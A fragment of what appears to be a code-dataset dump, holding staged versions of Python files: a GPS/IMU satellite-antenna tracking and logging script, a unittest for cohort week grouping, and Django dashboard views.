pass\n home = update_gps(position, home)\n home.date = ephem.now()\n magvar = get_magnetic_var(float(last_lat), float(last_lon))\n display_stats(orient, position, home)\n print(val)\n if time.time() - counter >= 1.0:\n counter = time.time()\n try:\n f.write(str(ephem.now()) + ',')\n f.write(str(position.get_speed()) + ',')\n f.write(str(orient.get_heading()) + ',')\n f.write(str(position.get_bearing()) + ',')\n f.write(val + '\\n')\n except:\n f.write('x\\n')\n if ii == 'q':\n f.close()\n break\n<mask token>\n", "step-5": "import time\nimport ephem\nimport serial\nimport nmea\nimport orientation\nimport sys\nimport threading\nfrom geomag import geomag\n\n#Constants\ninitial_az = 180\ninitial_alt = 90\nmin_elevation = 10.0\nsleep_time = 1.0\nunwind_threshold = 180\nsleep_on_unwind = 45.0\n\nlast_lon = '-88.787'\nlast_lat = '41.355'\nlast_heading = 0.0\n\nmount_port = '/dev/ttyUSB0'\narduino_port = '/dev/ttyACM0'\n\nclass SerialTester:\n def write(self,line):\n print(line)\n\n def read(self, num):\n return\n\nclass Antenna:\n azimuth = initial_az\n altitude = initial_alt\n parked = True\n\n def set_position(self, az, alt):\n self.azimuth = az\n self.altitude = alt\n az_int = round(az)\n alt_int = round(alt)\n ser.write(\":Sz \" + str(az_int) + \"*00:00#\")\n ser.write(\":Sa +\" + str(alt_int) + \"*00:00#\")\n ser.write(\":MS#\")\n ser.read(64)\n\n def park(self):\n if (self.parked):\n print('Antenna Parked')\n else:\n print('Parking Antenna')\n self.set_position(initial_az, initial_alt)\n self.parked = True\n\n def move(self, az, alt):\n if (self.parked):\n self.parked = False\n # Unwrap Cable if Azimuth will cross through True North\n # In the above case, Set Azimuth to 180 Degrees, then pick up\n # normal tracking\n # Then sleep 45 seconds to give the positioner time to\n # reposition\n if ((self.azimuth - az) > unwind_threshold):\n self.set_position(initial_az, self.altitude)\n print('Repositioning to unwrap cable')\n time.sleep(sleep_on_unwind)\n else:\n print('Tracking Mode')\n self.set_position(az, alt)\n\ndef reset():\n obs = ephem.Observer()\n #Set LAT/LON Coordinates to IMSA's location\n obs.date = ephem.now()\n obs.lon = last_lon\n obs.lat = last_lat\n obs.elevation = 0.0\n return obs\n\ndef update_gps(gprmc, obs):\n obsc = obs.copy()\n try:\n if gprmc.is_fixed() and gprmc.checksum():\n datetime = gprmc.get_date() + \" \" + gprmc.get_time()\n obsc.date = datetime\n obsc.lat = str(gprmc.get_lat())\n last_lat = str(gprmc.get_lat())\n obsc.lon = str(gprmc.get_lon())\n last_lon = str(gprmc.get_lon())\n return obsc\n except:\n return obs\n\n\ndef setup_serial(port, baud):\n # Set Serial Port - USB0\n ser = serial.Serial(port, baud)\n print(\"Port used:\" + ser.name)\n return ser\n# return SerialTester()\n\ndef setup_satellite():\n # Read in TLE for target satellite ICO F2\n icof2 = ephem.readtle('ICO F2',\n '1 26857U 01026A 16172.60175106 -.00000043 00000-0 00000+0 0 9997',\n '2 26857 044.9783 5.1953 0013193 227.2968 127.4685 03.92441898218058')\n return icof2\n\ndef to_degrees(radians):\n return radians / ephem.degree\n\ndef get_sat_position(icof2, home):\n icof2.compute(home)\n icof2_az = to_degrees(icof2.az)\n icof2_alt = to_degrees(icof2.alt)\n print('Current Satellite Location: Azimuth %3.2f deg, Altitude %3.2f deg' % (icof2_az, icof2_alt))\n return icof2_az, icof2_alt\n\ndef read_message(port):\n while True:\n try:\n line = port.readline().decode(\"ascii\").replace('\\r', '').replace('\\n', '')\n except:\n line = \"\"\n if len(line) > 0 and line[0] == \"$\":\n return line\n\ndef nmea_tester(sentence):\n mes = nmea.nmea(sentence)\n print(\"Checksum: \")\n print(mes.checksum())\n print(\"Reformatted Date & Time: \")\n print(mes.get_date())\n print(mes.get_time())\n print(\"Lat, Lon: \")\n print(str(mes.get_lat()) + \", \" + str(mes.get_lon()))\n print(\"Heading, MagVar\")\n print(str(mes.get_magnetic_heading()) + \", \" + str(mes.get_magnetic_var()))\n\n\ndef arduino_tester():\n ard = setup_serial(arduino_port, 115200)\n icof2 = setup_satellite()\n while True:\n try:\n line = read_nmea(ard)\n home = reset()\n home, heading = update(nmea.nmea(line))\n print(home.lat)\n print(home.lon)\n print(home.date)\n print(heading)\n except:\n break\n\ndef display_stats(orient, position, obs):\n try:\n print(\"\\n\"*65)\n magvar = get_magnetic_var(float(last_lat), float(last_lon))\n print(''' _.:::::._\n .:::'_|_':::.\n /::' --|-- '::\\\\\n |:\" .---\"---. ':|\n |: ( O R E O ) :|\n |:: `-------' ::|\n \\:::.......:::/\n ':::::::::::'\n `'\"\"\"'`\\n\\n''')\n print(\"Time: {}\\n\".format(ephem.now()))\n\n print('GPS\\n===\\nFix: {fix}, Lat: {lat}, Lon: {lon}'\n .format(fix = position.is_fixed(), lat = obs.lat, lon = obs.lon))\n print(position.unparsed)\n\n print(\"Sensor\\n===\")\n print('Heading: {heading:7.2f}, Pitch: {pitch:7.2f}, '\\\n 'Roll: {roll:7.2f}\\n---'.format(heading = orient.get_heading(),\n pitch = orient.get_pitch(),\n roll = orient.get_roll()))\n print('CALIBRATION Sys: {cal[0]}, Gyr: {cal[1]},'\\\n ' Acc: {cal[2]}, Mag: {cal[3]}\\n'\n .format(cal=orient.get_calibration()))\n print(\"\\nMagnetic Declination: {magvar:7.2f}, \"\n \"Adjusted Heading: {true_heading:7.2f}\"\n .format(magvar = magvar,\n true_heading= (orient.get_heading() +\n magvar+720)%360))\n print('Bearing: {bearing:7.2f}, Speed: {speed:4.2f}'\n .format(bearing = position.get_bearing(),\n speed = position.get_speed()))\n except:\n pass\n \n\n\n\ndef get_magnetic_var(lat, lon):\n gm = geomag.GeoMag()\n magobj = gm.GeoMag(lat, lon)\n return magobj.dec\n\n\n\nhome = reset()\nard = setup_serial(arduino_port, 115200)\ncounter = time.time()\nf = open(\"logs/log_\"+str(float(ephem.now()))+\".csv\", 'w')\nf.write(\"Epoch Time,Speed,Sensor,GPS,Waypoint\\n\")\norient = orientation.orientation(\"$IMU,0,0,0,0,0,0,0,0,0\")\nposition = nmea.nmea(\"$GPRMC,0,V,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0\")\nmagvar = get_magnetic_var(float(last_lat), float(last_lon))\n\nclass myThread(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n\n\n def run(self):\n global val\n global ii\n val = '@'\n ii = ''\n while True:\n ii = input()\n if ii == \"q\":\n break\n val = chr(ord(val) + 1)\n pass\n\nthread1 = myThread()\n\nthread1.start()\n\nwhile True:\n mes = (read_message(ard))\n if mes[:2] == \"$G\":\n try:\n position = nmea.nmea(mes)\n except:\n pass\n elif mes[:2] == \"$I\":\n try:\n orient = orientation.orientation(mes)\n except:\n pass\n # home.date = \"2016-06-28 12:00:00\"\n\n # Operate the antenna if the satellite's elevation is greater than 10\n # degrees\n # If the elevation IS above 10 degrees and the antenna is parked, then\n # unlatch the park_latch variable\n home = update_gps(position, home)\n home.date = ephem.now()\n\n magvar = get_magnetic_var(float(last_lat), float(last_lon))\n\n display_stats(orient, position, home)\n print(val)\n if time.time() - counter >= 1.0:\n counter = time.time()\n try:\n f.write(str(ephem.now())+\",\")\n f.write(str(position.get_speed())+\",\")\n f.write(str(orient.get_heading())+\",\")\n f.write(str(position.get_bearing())+\",\")\n f.write(val+\"\\n\")\n except:\n f.write(\"x\\n\")\n if ii == \"q\":\n f.close()\n break\n\n''' icof2_az, icof2_alt = get_sat_position(icof2, home)\n if (icof2_alt >= min_elevation):\n antenna.set_position(icof2_az - heading, icof2_alt)\n\n else:\n antenna.park()'''\n", "step-ids": [ 15, 18, 21, 25, 26 ] }
[ 15, 18, 21, 25, 26 ]
<|reserved_special_token_0|> class CohortTest(TestCase): def testAnalyzeNewGroups(self): cohort = Cohort(aStartDate=TimeFormatter.toDatetime( '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime( '2014-06-01 23:59:59'), aInterval=7) groups = cohort.groups group = Group(anId=1, aStartDate=TimeFormatter.toDatetime( '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-11 23:59:59'), aNickname='5월 1째 주') self.assertEqual(groups[0].period, group.period) group = Group(anId=2, aStartDate=TimeFormatter.toDatetime( '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-18 23:59:59'), aNickname='5월 2째 주') self.assertEqual(groups[1].period, group.period) group = Group(anId=3, aStartDate=TimeFormatter.toDatetime( '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-25 23:59:59'), aNickname='5월 3째 주') self.assertEqual(groups[2].period, group.period) group = Group(anId=3, aStartDate=TimeFormatter.toDatetime( '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-06-01 23:59:59'), aNickname='5월 4째 주') self.assertEqual(groups[3].period, group.period) self.assertEqual(groups.__len__(), 4) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class CohortTest(TestCase): def testAnalyzeNewGroups(self): cohort = Cohort(aStartDate=TimeFormatter.toDatetime( '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime( '2014-06-01 23:59:59'), aInterval=7) groups = cohort.groups group = Group(anId=1, aStartDate=TimeFormatter.toDatetime( '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-11 23:59:59'), aNickname='5월 1째 주') self.assertEqual(groups[0].period, group.period) group = Group(anId=2, aStartDate=TimeFormatter.toDatetime( '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-18 23:59:59'), aNickname='5월 2째 주') self.assertEqual(groups[1].period, group.period) group = Group(anId=3, aStartDate=TimeFormatter.toDatetime( '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-25 23:59:59'), aNickname='5월 3째 주') self.assertEqual(groups[2].period, group.period) group = Group(anId=3, aStartDate=TimeFormatter.toDatetime( '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-06-01 23:59:59'), aNickname='5월 4째 주') self.assertEqual(groups[3].period, group.period) self.assertEqual(groups.__len__(), 4) def testSnapshots(self): self.fail('should test this! but take too long network time') <|reserved_special_token_1|> <|reserved_special_token_0|> __author__ = 'continueing' class CohortTest(TestCase): def testAnalyzeNewGroups(self): cohort = Cohort(aStartDate=TimeFormatter.toDatetime( '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime( '2014-06-01 23:59:59'), aInterval=7) groups = cohort.groups group = Group(anId=1, aStartDate=TimeFormatter.toDatetime( '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-11 23:59:59'), aNickname='5월 1째 주') self.assertEqual(groups[0].period, group.period) group = Group(anId=2, aStartDate=TimeFormatter.toDatetime( '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-18 23:59:59'), aNickname='5월 2째 주') self.assertEqual(groups[1].period, group.period) group = Group(anId=3, aStartDate=TimeFormatter.toDatetime( '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-25 23:59:59'), aNickname='5월 3째 주') self.assertEqual(groups[2].period, group.period) group = Group(anId=3, aStartDate=TimeFormatter.toDatetime( '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-06-01 23:59:59'), aNickname='5월 4째 주') self.assertEqual(groups[3].period, group.period) self.assertEqual(groups.__len__(), 4) def testSnapshots(self): self.fail('should test this! but take too long network time') <|reserved_special_token_1|> from unittest.case import TestCase from datetime import datetime from src.main.domain.Cohort import Cohort from src.main.domain.Group import Group from src.main.util.TimeFormatter import TimeFormatter __author__ = 'continueing' class CohortTest(TestCase): def testAnalyzeNewGroups(self): cohort = Cohort(aStartDate=TimeFormatter.toDatetime( '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime( '2014-06-01 23:59:59'), aInterval=7) groups = cohort.groups group = Group(anId=1, aStartDate=TimeFormatter.toDatetime( '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-11 23:59:59'), aNickname='5월 1째 주') self.assertEqual(groups[0].period, group.period) group = Group(anId=2, aStartDate=TimeFormatter.toDatetime( '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-18 23:59:59'), aNickname='5월 2째 주') self.assertEqual(groups[1].period, group.period) group = Group(anId=3, aStartDate=TimeFormatter.toDatetime( '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-05-25 23:59:59'), aNickname='5월 3째 주') self.assertEqual(groups[2].period, group.period) group = Group(anId=3, aStartDate=TimeFormatter.toDatetime( '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime( '2014-06-01 23:59:59'), aNickname='5월 4째 주') self.assertEqual(groups[3].period, group.period) self.assertEqual(groups.__len__(), 4) def testSnapshots(self): self.fail('should test this! but take too long network time') <|reserved_special_token_1|> from unittest.case import TestCase from datetime import datetime from src.main.domain.Cohort import Cohort from src.main.domain.Group import Group from src.main.util.TimeFormatter import TimeFormatter __author__ = 'continueing' class CohortTest(TestCase): def testAnalyzeNewGroups(self): cohort = Cohort(aStartDate=TimeFormatter.toDatetime('2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime('2014-06-01 23:59:59'), aInterval = 7) groups = cohort.groups group = Group(anId=1, aStartDate=TimeFormatter.toDatetime('2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-11 23:59:59'), aNickname="5월 1째 주") self.assertEqual(groups[0].period, group.period) group = Group(anId=2, aStartDate=TimeFormatter.toDatetime('2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-18 23:59:59'), aNickname="5월 2째 주") self.assertEqual(groups[1].period, group.period) group = Group(anId=3, aStartDate=TimeFormatter.toDatetime('2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-25 23:59:59'), aNickname="5월 3째 주") self.assertEqual(groups[2].period, group.period) group = Group(anId=3, aStartDate=TimeFormatter.toDatetime('2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-06-01 23:59:59'), aNickname="5월 4째 주") self.assertEqual(groups[3].period, group.period) self.assertEqual(groups.__len__(),4) def testSnapshots(self): self.fail("should test this! but take too long network time")
flexible
{ "blob_id": "f12bdfc054e62dc244a95daad9682790c880f20d", "index": 5367, "step-1": "<mask token>\n\n\nclass CohortTest(TestCase):\n\n def testAnalyzeNewGroups(self):\n cohort = Cohort(aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aInterval=7)\n groups = cohort.groups\n group = Group(anId=1, aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-11 23:59:59'), aNickname='5월 1째 주')\n self.assertEqual(groups[0].period, group.period)\n group = Group(anId=2, aStartDate=TimeFormatter.toDatetime(\n '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-18 23:59:59'), aNickname='5월 2째 주')\n self.assertEqual(groups[1].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-25 23:59:59'), aNickname='5월 3째 주')\n self.assertEqual(groups[2].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aNickname='5월 4째 주')\n self.assertEqual(groups[3].period, group.period)\n self.assertEqual(groups.__len__(), 4)\n <mask token>\n", "step-2": "<mask token>\n\n\nclass CohortTest(TestCase):\n\n def testAnalyzeNewGroups(self):\n cohort = Cohort(aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aInterval=7)\n groups = cohort.groups\n group = Group(anId=1, aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-11 23:59:59'), aNickname='5월 1째 주')\n self.assertEqual(groups[0].period, group.period)\n group = Group(anId=2, aStartDate=TimeFormatter.toDatetime(\n '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-18 23:59:59'), aNickname='5월 2째 주')\n self.assertEqual(groups[1].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-25 23:59:59'), aNickname='5월 3째 주')\n self.assertEqual(groups[2].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aNickname='5월 4째 주')\n self.assertEqual(groups[3].period, group.period)\n self.assertEqual(groups.__len__(), 4)\n\n def testSnapshots(self):\n self.fail('should test this! but take too long network time')\n", "step-3": "<mask token>\n__author__ = 'continueing'\n\n\nclass CohortTest(TestCase):\n\n def testAnalyzeNewGroups(self):\n cohort = Cohort(aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aInterval=7)\n groups = cohort.groups\n group = Group(anId=1, aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-11 23:59:59'), aNickname='5월 1째 주')\n self.assertEqual(groups[0].period, group.period)\n group = Group(anId=2, aStartDate=TimeFormatter.toDatetime(\n '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-18 23:59:59'), aNickname='5월 2째 주')\n self.assertEqual(groups[1].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-25 23:59:59'), aNickname='5월 3째 주')\n self.assertEqual(groups[2].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aNickname='5월 4째 주')\n self.assertEqual(groups[3].period, group.period)\n self.assertEqual(groups.__len__(), 4)\n\n def testSnapshots(self):\n self.fail('should test this! but take too long network time')\n", "step-4": "from unittest.case import TestCase\nfrom datetime import datetime\nfrom src.main.domain.Cohort import Cohort\nfrom src.main.domain.Group import Group\nfrom src.main.util.TimeFormatter import TimeFormatter\n__author__ = 'continueing'\n\n\nclass CohortTest(TestCase):\n\n def testAnalyzeNewGroups(self):\n cohort = Cohort(aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aInterval=7)\n groups = cohort.groups\n group = Group(anId=1, aStartDate=TimeFormatter.toDatetime(\n '2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-11 23:59:59'), aNickname='5월 1째 주')\n self.assertEqual(groups[0].period, group.period)\n group = Group(anId=2, aStartDate=TimeFormatter.toDatetime(\n '2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-18 23:59:59'), aNickname='5월 2째 주')\n self.assertEqual(groups[1].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-05-25 23:59:59'), aNickname='5월 3째 주')\n self.assertEqual(groups[2].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime(\n '2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime(\n '2014-06-01 23:59:59'), aNickname='5월 4째 주')\n self.assertEqual(groups[3].period, group.period)\n self.assertEqual(groups.__len__(), 4)\n\n def testSnapshots(self):\n self.fail('should test this! but take too long network time')\n", "step-5": "from unittest.case import TestCase\nfrom datetime import datetime\nfrom src.main.domain.Cohort import Cohort\nfrom src.main.domain.Group import Group\nfrom src.main.util.TimeFormatter import TimeFormatter\n\n__author__ = 'continueing'\n\n\nclass CohortTest(TestCase):\n\n def testAnalyzeNewGroups(self):\n cohort = Cohort(aStartDate=TimeFormatter.toDatetime('2014-05-05 00:00:00'), aEndDate=TimeFormatter.toDatetime('2014-06-01 23:59:59'), aInterval = 7)\n groups = cohort.groups\n\n group = Group(anId=1, aStartDate=TimeFormatter.toDatetime('2014-05-05 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-11 23:59:59'), aNickname=\"5월 1째 주\")\n self.assertEqual(groups[0].period, group.period)\n group = Group(anId=2, aStartDate=TimeFormatter.toDatetime('2014-05-12 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-18 23:59:59'), aNickname=\"5월 2째 주\")\n self.assertEqual(groups[1].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime('2014-05-19 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-05-25 23:59:59'), aNickname=\"5월 3째 주\")\n self.assertEqual(groups[2].period, group.period)\n group = Group(anId=3, aStartDate=TimeFormatter.toDatetime('2014-05-26 00:00:00'), anEndDate=TimeFormatter.toDatetime('2014-06-01 23:59:59'), aNickname=\"5월 4째 주\")\n self.assertEqual(groups[3].period, group.period)\n self.assertEqual(groups.__len__(),4)\n\n def testSnapshots(self):\n self.fail(\"should test this! but take too long network time\")\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
<|reserved_special_token_0|> def dashboard(request): context = {'context_list': ContextDefinition.objects.filter(Q(owner= request.user) & Q(inherited=False) & Q(abstract=False)).order_by( '-public', 'name'), 'full_abstract_list': get_list_allowed_abstract (request), 'my_abstract_list': ContextDefinition.objects.filter(Q( owner=request.user) & Q(inherited=False) & Q(abstract=True)). order_by('name'), 'cluster_list': ClusterDefinition.objects.filter( owner=request.user).order_by('-public', 'name'), 'machine_list': Machines.objects.filter(owner=request.user)} context['webapi_configurations'] = settings.WEBAPI_CONFIGURATIONS push_to_context('redirect_msg_info', 'msg_info', context, request) push_to_context('redirect_msg_error', 'msg_error', context, request) push_to_context('redirect_msg_warning', 'msg_warning', context, request) push_to_context('redirect_msg_confirm', 'msg_confirm', context, request) return uncache_response(render_to_response('pages/dashboard.html', context, RequestContext(request))) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def welcome(request): return render_to_response('pages/welcome.html', {}, RequestContext(request) ) def dashboard(request): context = {'context_list': ContextDefinition.objects.filter(Q(owner= request.user) & Q(inherited=False) & Q(abstract=False)).order_by( '-public', 'name'), 'full_abstract_list': get_list_allowed_abstract (request), 'my_abstract_list': ContextDefinition.objects.filter(Q( owner=request.user) & Q(inherited=False) & Q(abstract=True)). order_by('name'), 'cluster_list': ClusterDefinition.objects.filter( owner=request.user).order_by('-public', 'name'), 'machine_list': Machines.objects.filter(owner=request.user)} context['webapi_configurations'] = settings.WEBAPI_CONFIGURATIONS push_to_context('redirect_msg_info', 'msg_info', context, request) push_to_context('redirect_msg_error', 'msg_error', context, request) push_to_context('redirect_msg_warning', 'msg_warning', context, request) push_to_context('redirect_msg_confirm', 'msg_confirm', context, request) return uncache_response(render_to_response('pages/dashboard.html', context, RequestContext(request))) def test(request): raw = ( '<h1>404 - Not found</h1><p>This is not the website you are looking for</p>' ) return render_to_response('core/raw.html', {'body': raw}, RequestContext(request)) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def welcome(request): return render_to_response('pages/welcome.html', {}, RequestContext(request) ) def dashboard(request): context = {'context_list': ContextDefinition.objects.filter(Q(owner= request.user) & Q(inherited=False) & Q(abstract=False)).order_by( '-public', 'name'), 'full_abstract_list': get_list_allowed_abstract (request), 'my_abstract_list': ContextDefinition.objects.filter(Q( owner=request.user) & Q(inherited=False) & Q(abstract=True)). order_by('name'), 'cluster_list': ClusterDefinition.objects.filter( owner=request.user).order_by('-public', 'name'), 'machine_list': Machines.objects.filter(owner=request.user)} context['webapi_configurations'] = settings.WEBAPI_CONFIGURATIONS push_to_context('redirect_msg_info', 'msg_info', context, request) push_to_context('redirect_msg_error', 'msg_error', context, request) push_to_context('redirect_msg_warning', 'msg_warning', context, request) push_to_context('redirect_msg_confirm', 'msg_confirm', context, request) return uncache_response(render_to_response('pages/dashboard.html', context, RequestContext(request))) def test(request): raw = ( '<h1>404 - Not found</h1><p>This is not the website you are looking for</p>' ) return render_to_response('core/raw.html', {'body': raw}, RequestContext(request)) def push_to_context(sessionName, contextName, context, request): if sessionName in request.session: context[contextName] = request.session[sessionName] del request.session[sessionName] <|reserved_special_token_1|> from django.http import HttpResponse from django.shortcuts import render_to_response from django.template import RequestContext from django.db.models import Q from cvmo import settings from cvmo.context.models import ContextDefinition, Machines, ClusterDefinition, MarketplaceContextEntry from cvmo.context.plugins import ContextPlugins from cvmo.context.utils.views import uncache_response from cvmo.context.utils.views import get_list_allowed_abstract def welcome(request): return render_to_response('pages/welcome.html', {}, RequestContext(request) ) def dashboard(request): context = {'context_list': ContextDefinition.objects.filter(Q(owner= request.user) & Q(inherited=False) & Q(abstract=False)).order_by( '-public', 'name'), 'full_abstract_list': get_list_allowed_abstract (request), 'my_abstract_list': ContextDefinition.objects.filter(Q( owner=request.user) & Q(inherited=False) & Q(abstract=True)). order_by('name'), 'cluster_list': ClusterDefinition.objects.filter( owner=request.user).order_by('-public', 'name'), 'machine_list': Machines.objects.filter(owner=request.user)} context['webapi_configurations'] = settings.WEBAPI_CONFIGURATIONS push_to_context('redirect_msg_info', 'msg_info', context, request) push_to_context('redirect_msg_error', 'msg_error', context, request) push_to_context('redirect_msg_warning', 'msg_warning', context, request) push_to_context('redirect_msg_confirm', 'msg_confirm', context, request) return uncache_response(render_to_response('pages/dashboard.html', context, RequestContext(request))) def test(request): raw = ( '<h1>404 - Not found</h1><p>This is not the website you are looking for</p>' ) return render_to_response('core/raw.html', {'body': raw}, RequestContext(request)) def push_to_context(sessionName, contextName, context, request): if sessionName in request.session: context[contextName] = request.session[sessionName] del request.session[sessionName] <|reserved_special_token_1|> from django.http import HttpResponse from django.shortcuts import render_to_response from django.template import RequestContext from django.db.models import Q from cvmo import settings from cvmo.context.models import ContextDefinition, Machines, ClusterDefinition, MarketplaceContextEntry from cvmo.context.plugins import ContextPlugins from cvmo.context.utils.views import uncache_response from cvmo.context.utils.views import get_list_allowed_abstract def welcome(request): return render_to_response('pages/welcome.html', {}, RequestContext(request)) def dashboard(request): context = { 'context_list': ContextDefinition.objects.filter(Q(owner=request.user) & Q(inherited=False) & Q(abstract=False)).order_by('-public', 'name'), 'full_abstract_list': get_list_allowed_abstract(request), 'my_abstract_list': ContextDefinition.objects.filter(Q(owner=request.user) & Q(inherited=False) & Q(abstract=True)).order_by('name'), 'cluster_list': ClusterDefinition.objects.filter(owner=request.user).order_by('-public', 'name'), 'machine_list': Machines.objects.filter(owner=request.user) } context["webapi_configurations"] = settings.WEBAPI_CONFIGURATIONS push_to_context("redirect_msg_info", "msg_info", context, request) push_to_context("redirect_msg_error", "msg_error", context, request) push_to_context("redirect_msg_warning", "msg_warning", context, request) push_to_context("redirect_msg_confirm", "msg_confirm", context, request) return uncache_response(render_to_response('pages/dashboard.html', context, RequestContext(request))) def test(request): raw = "<h1>404 - Not found</h1><p>This is not the website you are looking for</p>" return render_to_response('core/raw.html', {'body': raw}, RequestContext(request)) def push_to_context(sessionName, contextName, context, request): if sessionName in request.session: context[contextName] = request.session[sessionName] del request.session[sessionName]
flexible
{ "blob_id": "4db8b4403dd9064b7d5f935d4b9d111508c965fb", "index": 1268, "step-1": "<mask token>\n\n\ndef dashboard(request):\n context = {'context_list': ContextDefinition.objects.filter(Q(owner=\n request.user) & Q(inherited=False) & Q(abstract=False)).order_by(\n '-public', 'name'), 'full_abstract_list': get_list_allowed_abstract\n (request), 'my_abstract_list': ContextDefinition.objects.filter(Q(\n owner=request.user) & Q(inherited=False) & Q(abstract=True)).\n order_by('name'), 'cluster_list': ClusterDefinition.objects.filter(\n owner=request.user).order_by('-public', 'name'), 'machine_list':\n Machines.objects.filter(owner=request.user)}\n context['webapi_configurations'] = settings.WEBAPI_CONFIGURATIONS\n push_to_context('redirect_msg_info', 'msg_info', context, request)\n push_to_context('redirect_msg_error', 'msg_error', context, request)\n push_to_context('redirect_msg_warning', 'msg_warning', context, request)\n push_to_context('redirect_msg_confirm', 'msg_confirm', context, request)\n return uncache_response(render_to_response('pages/dashboard.html',\n context, RequestContext(request)))\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef welcome(request):\n return render_to_response('pages/welcome.html', {}, RequestContext(request)\n )\n\n\ndef dashboard(request):\n context = {'context_list': ContextDefinition.objects.filter(Q(owner=\n request.user) & Q(inherited=False) & Q(abstract=False)).order_by(\n '-public', 'name'), 'full_abstract_list': get_list_allowed_abstract\n (request), 'my_abstract_list': ContextDefinition.objects.filter(Q(\n owner=request.user) & Q(inherited=False) & Q(abstract=True)).\n order_by('name'), 'cluster_list': ClusterDefinition.objects.filter(\n owner=request.user).order_by('-public', 'name'), 'machine_list':\n Machines.objects.filter(owner=request.user)}\n context['webapi_configurations'] = settings.WEBAPI_CONFIGURATIONS\n push_to_context('redirect_msg_info', 'msg_info', context, request)\n push_to_context('redirect_msg_error', 'msg_error', context, request)\n push_to_context('redirect_msg_warning', 'msg_warning', context, request)\n push_to_context('redirect_msg_confirm', 'msg_confirm', context, request)\n return uncache_response(render_to_response('pages/dashboard.html',\n context, RequestContext(request)))\n\n\ndef test(request):\n raw = (\n '<h1>404 - Not found</h1><p>This is not the website you are looking for</p>'\n )\n return render_to_response('core/raw.html', {'body': 